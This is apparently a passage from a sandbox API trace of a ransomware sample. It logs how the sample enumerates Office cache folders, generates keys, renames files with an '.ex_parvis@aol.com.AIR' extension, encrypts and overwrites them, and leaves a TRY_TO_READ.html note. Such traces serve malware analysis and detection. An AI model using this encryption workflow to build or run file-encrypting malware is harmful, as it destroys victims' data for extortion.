[0117.507] GetLastError () returned 0x0 [0117.507] FindNextFileW (in: hFindFile=0x35de18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971aaa50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3852a8 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0117.507] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0117.508] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0117.508] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0117.508] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0117.508] GetProcessHeap () returned 0x2e0000 [0117.508] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x385350 [0117.508] lstrcpyW (in: lpString1=0x385350, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" [0117.508] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0117.508] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0117.510] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0117.510] GetProcessHeap () returned 0x2e0000 [0117.510] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385350 | out: hHeap=0x2e0000) returned 1 [0117.510] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2296) returned 1 [0117.510] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x8f8 [0117.510] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0117.510] GetProcessHeap () returned 0x2e0000 [0117.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0117.510] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0117.510] WriteFile (in: hFile=0x470, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0117.512] WriteFile (in: hFile=0x470, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0117.512] WriteFile (in: hFile=0x470, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0117.512] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8f8) returned 0x385350 [0117.512] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8f8) returned 0x385c50 [0117.512] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.512] ReadFile (in: hFile=0x470, lpBuffer=0x385350, nNumberOfBytesToRead=0x8f8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385350*, lpNumberOfBytesRead=0x2acf9c8*=0x8f8, lpOverlapped=0x0) returned 1 [0117.512] SetFilePointer (in: hFile=0x470, lDistanceToMove=-2296, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.512] WriteFile (in: hFile=0x470, lpBuffer=0x385c50*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385c50*, lpNumberOfBytesWritten=0x2acf9c8*=0x8f8, lpOverlapped=0x0) returned 1 [0117.512] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385350 | out: hHeap=0x2e0000) returned 1 [0117.512] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385c50 | out: hHeap=0x2e0000) returned 1 [0117.512] CloseHandle (hObject=0x470) returned 1 [0117.513] GetProcessHeap () returned 0x2e0000 [0117.513] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0117.513] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0117.513] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.513] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3852a8 | out: hHeap=0x2e0000) returned 1 [0117.513] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385200 | out: hHeap=0x2e0000) returned 1 [0117.513] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385200 [0117.513] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0117.513] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0117.513] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0117.513] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0117.513] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", dwFileAttributes=0x80) returned 1 [0117.514] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 76 [0117.514] GetProcessHeap () returned 0x2e0000 [0117.514] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0117.514] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" [0117.514] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0117.514] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0117.516] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0117.516] GetProcessHeap () returned 0x2e0000 [0117.516] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0117.516] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1565) returned 1 [0117.516] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x61d [0117.516] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0117.516] GetProcessHeap () returned 0x2e0000 [0117.517] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0117.517] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0117.517] WriteFile (in: hFile=0x470, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0117.518] WriteFile (in: hFile=0x470, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0117.518] WriteFile (in: hFile=0x470, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0117.518] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x61d) returned 0x3852a8 [0117.518] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x61d) returned 0x3858d0 [0117.518] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.518] ReadFile (in: hFile=0x470, lpBuffer=0x3852a8, nNumberOfBytesToRead=0x61d, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3852a8*, lpNumberOfBytesRead=0x2acf9c8*=0x61d, lpOverlapped=0x0) returned 1 [0117.518] SetFilePointer (in: hFile=0x470, lDistanceToMove=-1565, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.519] WriteFile (in: hFile=0x470, lpBuffer=0x3858d0*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3858d0*, lpNumberOfBytesWritten=0x2acf9c8*=0x61d, lpOverlapped=0x0) returned 1 [0117.519] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3852a8 | out: hHeap=0x2e0000) returned 1 [0117.519] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3858d0 | out: hHeap=0x2e0000) returned 1 [0117.519] CloseHandle (hObject=0x470) returned 1 [0117.519] GetProcessHeap () returned 0x2e0000 [0117.519] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0117.519] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0117.519] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.519] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385200 | out: hHeap=0x2e0000) returned 1 [0117.519] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385158 | out: hHeap=0x2e0000) returned 1 [0117.519] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385158 [0117.519] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0117.519] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0117.519] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0117.520] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0117.520] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", dwFileAttributes=0x80) returned 1 [0117.520] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 76 [0117.520] GetProcessHeap () returned 0x2e0000 [0117.520] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0117.520] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" [0117.520] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0117.520] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0117.522] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0117.523] GetProcessHeap () returned 0x2e0000 [0117.523] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0117.523] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2506240) returned 1 [0117.523] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x263e00 [0117.523] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0117.523] GetProcessHeap () returned 0x2e0000 [0117.523] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0117.523] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0117.523] WriteFile (in: hFile=0x470, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0117.524] WriteFile (in: hFile=0x470, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0117.525] WriteFile (in: hFile=0x470, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0117.525] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x263e00) returned 0x30d0020 [0117.525] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x263e00) returned 0x3340020 [0117.525] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.526] ReadFile (in: hFile=0x470, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x263e00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x263e00, lpOverlapped=0x0) returned 1 [0117.656] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0117.656] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0117.656] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", dwFileAttributes=0x80) returned 1 [0117.656] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 75 [0117.656] GetProcessHeap () returned 0x2e0000 [0117.656] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0117.657] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" [0117.657] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0117.657] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0117.659] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0117.659] GetProcessHeap () returned 0x2e0000 [0117.659] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0117.659] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=16972987) returned 1 [0117.659] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x102fcbb [0117.659] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0117.659] GetProcessHeap () returned 0x2e0000 [0117.659] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0117.660] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0117.660] WriteFile (in: hFile=0x470, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0117.661] WriteFile (in: hFile=0x470, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0117.661] WriteFile (in: hFile=0x470, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0117.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102fcbb) returned 0x30d0020 [0117.662] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102fcbb) returned 0x4100020 [0117.663] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.663] ReadFile (in: hFile=0x470, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x102fcbb, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x102fcbb, lpOverlapped=0x0) returned 1 [0118.741] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35de58 [0118.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0118.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0118.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0118.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0118.741] GetLastError () returned 0x0 [0118.741] FindNextFileW (in: hFindFile=0x35de58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0118.741] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0118.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0118.741] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, 